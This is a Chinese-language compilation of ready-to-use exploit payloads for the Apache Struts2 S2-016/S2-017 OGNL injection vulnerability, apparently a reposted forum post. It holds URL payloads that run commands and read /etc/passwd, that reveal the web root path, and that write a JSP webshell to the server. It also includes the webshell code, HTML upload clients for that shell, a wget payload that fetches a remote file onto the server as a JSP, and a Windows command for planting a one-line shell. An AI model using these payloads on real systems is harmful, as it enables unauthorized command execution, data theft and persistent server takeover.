Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell exp整理

以下是Struts2 S2-016/S2-017漏洞 命令执行整理

带回显命令执行

http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew
java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

爆路径

http://www.example.com/struts2-blank/example/X.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

写文件

http://www.example.com/struts2-blank/example/X.action?redirect:${

%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),

%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),

new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()

}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e

写入的文件内容：

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

其实就是一个jsp的小马，需要客户端配合

函数f是文件名，t是内容

客户端：

<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">

<textarea name=t cols=120 rows=10 width=45>your code</textarea>

<center>

<input type=submit value="提交">

</form>

就在当前目录建立一个fjp.jsp

shell：http://www.example.com/struts2-blank/example/fjp.jsp

还有@园长的一个客户端：

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8">

<title>jsp-园长</title>

</head>

<style>

.main{width:980px;height:600px;margin:0 auto;}

.url{width:300px;}

.fn{width:60px;}

.content{width:80%;height:60%;}

</style>

<script>

function upload(){

var url = document.getElementById('url').value,

content = document.getElementById('content').value,

fileName = document.getElementById('fn').value,

form = document.getElementById('fm');

if(url.length == 0){

alert("Url not allowd empty!");

return ;

}

if(content.length == 0){

alert("Content not allowd empty!");

return ;

}

if(fileName.length == 0){

alert("FileName not allowd empty!");

return ;

}

form.action = url;

form.submit();

}

</script>

<body>

<div class="main">

<form id="fm" method="post">

URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>

FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />

<a href="javascript:upload();">Upload</a>

<textarea id="content" class="content" name="t" ></textarea>

</form>

</div>

</body>

</html>

还有@X发的一个wget的getshell

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}

)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println
(%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}

转载自http://www.xinyues.org/thread-1385-1-1.html

原文链接：http://winbule.com/struts2-s2-016s2-017.html

MSF 利用模块 https://dev.metasploit.com/redmine/projects/framework/repository/revisions/master/entry/modules/exploits/multi/http/struts_default_action_mapper.rb
win cmd 下执行

echo 一句话代码 >> "服务器路径\test.jsp"